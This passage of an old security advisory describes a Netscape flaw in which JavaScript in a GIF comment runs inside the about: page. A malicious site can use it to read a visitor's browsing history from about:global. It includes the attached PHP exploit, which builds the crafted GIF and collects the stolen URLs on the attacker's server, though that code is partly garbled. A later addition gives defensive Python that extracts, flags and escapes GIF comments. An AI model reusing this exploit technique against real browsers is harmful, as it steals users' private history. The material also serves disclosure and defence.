to documents at another domain." Now there is the protocol "about:" that is used for some special tasks.

about:        - shows Netscape version and copyrights
about:blank   - shows a blank document
about:config  - shows Browser configuration.
about:global  - shows Information about the Netscape global history
about:        - shows Information about the specified url
..

There are some other about: documents (try grepping the netscape binary). about:global is very interesting since all visited documents are listed there. So I tried to find a way to access this information. I created a frameset with 2 frames. The first frame (called foo) contains about:global. Using , or document.location.href="about.global"; for setting this url did not work. So I used the following trick to make it work:
My intention is that the second frame (called bar) grabs 10 urls from the first frame using javascript and sends them to the server. Accessing parent.frames["foo"].document.links does not work since foo is displaying an about: document and bar is a normal http document: "access disallowed from scripts at blah to documents..." So I tried to find a way to start a javascript within an about: document. about: comes to mind since there are a lot of server-specified values. First I tried to inject javascript using the url of the script. But since this url is encoded (space => %20 etc.) there is no way in. Modifying the Content-Type (File MIME Type) did not work either because Netscape opens a "Save as..." window when supplying an unknown MIME type. Then I remembered that Netscape shows the comment included in gif files. A quick test showed that the comment is not escaped. So Javascript in gif comments is executed in the about: realm. This means that this script can then access the content of about:global. nice. The following script included in the comment reads 10 urls in the about:global frame (foo), stores them in the form and finally submits this form.
The server has 10 urls of about:global urls now. Accessing about:config should be possible too, but I did not try it.

{ Solution }--------------------------------------------------------

Disable Javascript
Upgrade to 4.77

{ Exploit }---------------------------------------------------------

attached

--------------------------------------------------------------------
Florian Wesch (fw@dividuum.de)
http://dividuum.de
*/

$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
if (strlen($self)>64) {
  echo "Url of $self is too long. 64 maximum.";
  echo "You can change this but I think 64 should be enough for anybody ;-)";
  exit;
}
if (!isset($mode)) $mode="intro";
// If urllist is submitted
if (isset($u)) $mode="showhist";

switch ($mode) {
  case "intro":
?>
Submit 10 urls of your history
Waiting 5 seconds...
'.*/ /* I'm using POST so the submitted urls do not appear in the logfile */ "
'));
    $gif.= "00000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="0000000000000000000000000000000000000000000";
    $gif.="00000000000002c000000000a000a00000813004708";
    $gif.="1c48b0a0c18308132a5cc8b061c28000003b";
    echo pack("H".strlen($gif), $gif);
    break;
  case "showhist":
    $urls=explode("|",$u);
    echo "Top 10 urls in about:global";
    foreach ($urls as $url) {
      echo "$url";
    }
};
?>
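The root cause described above is that the browser copied the GIF Comment Extension (block introducer 0x21, label 0xFE) into an HTML page without escaping it. The following Python is an added example, not part of the original post or of the exploit attached to it: it walks the GIF block structure, pulls out every comment payload, flags comments that carry HTML markup (the check an upload filter or a proxy could run), and shows the escaping that the about: page should have applied before interpolating the comment into HTML. The sample GIFs are constructed inline by build_gif_with_comment, which emits a minimal 1x1 GIF89a; the function and marker names are this example's own.

```python
import html
import struct

# Substrings whose presence in a comment means it would change meaning if
# pasted into HTML unescaped (marker list chosen for this example).
MARKUP_MARKERS = (b"<", b">", b"javascript:")


def _sub_blocks(data: bytes) -> bytes:
    """Encode data as GIF data sub-blocks (<=255 bytes each) plus a 0x00 terminator."""
    out = bytearray()
    for i in range(0, len(data), 255):
        chunk = data[i:i + 255]
        out.append(len(chunk))
        out += chunk
    out.append(0)
    return bytes(out)


def _read_sub_blocks(data: bytes, pos: int):
    """Read sub-blocks starting at pos; return (payload, position after terminator)."""
    out = bytearray()
    while True:
        size = data[pos]
        pos += 1
        if size == 0:
            return bytes(out), pos
        out += data[pos:pos + size]
        pos += size


def build_gif_with_comment(comment: bytes) -> bytes:
    """Constructed sample: a valid 1x1 GIF89a carrying one Comment Extension."""
    # Logical screen descriptor: 1x1, packed=0 (no global color table), bg=0, aspect=0
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0)
    comment_ext = b"\x21\xFE" + _sub_blocks(comment)
    image_desc = b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    # LZW minimum code size 2 followed by the standard two-byte stream for one pixel
    image_data = b"\x02" + _sub_blocks(b"\x44\x01")
    return header + comment_ext + image_desc + image_data + b"\x3B"


def extract_gif_comments(data: bytes) -> list:
    """Parse the GIF block stream and return every Comment Extension payload."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    pos = 6
    _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, pos)
    pos += 7
    if packed & 0x80:  # skip global color table: 3 * 2^(N+1) bytes
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    comments = []
    while pos < len(data):
        introducer = data[pos]
        pos += 1
        if introducer == 0x3B:  # trailer
            break
        if introducer == 0x21:  # extension block: label byte, then sub-blocks
            label = data[pos]
            pos += 1
            payload, pos = _read_sub_blocks(data, pos)
            if label == 0xFE:
                comments.append(payload)
        elif introducer == 0x2C:  # image descriptor, optional local color table, LZW data
            _l, _t, _iw, _ih, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if ipacked & 0x80:
                pos += 3 * (2 ** ((ipacked & 0x07) + 1))
            pos += 1  # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)
        else:
            raise ValueError(f"unexpected block introducer 0x{introducer:02x} at {pos - 1}")
    return comments


def comment_contains_markup(comment: bytes) -> bool:
    """Detection check: does the comment carry anything HTML would interpret?"""
    lowered = comment.lower()
    return any(marker in lowered for marker in MARKUP_MARKERS)


def safe_comment_html(comment: bytes) -> str:
    """Mitigation: escape the comment before it is interpolated into an HTML page."""
    return html.escape(comment.decode("latin-1"), quote=True)


if __name__ == "__main__":
    for sample in (b"made with constructed demo", b"hello <b>bold</b>"):
        gif = build_gif_with_comment(sample)
        for c in extract_gif_comments(gif):
            print(comment_contains_markup(c), safe_comment_html(c))
```

The parser deliberately skips image data and the other extension types rather than decoding them, so it is safe to run over untrusted uploads: the only bytes it ever interprets are block lengths. Comments longer than 255 bytes span several sub-blocks, which is why the extractor concatenates them before checking.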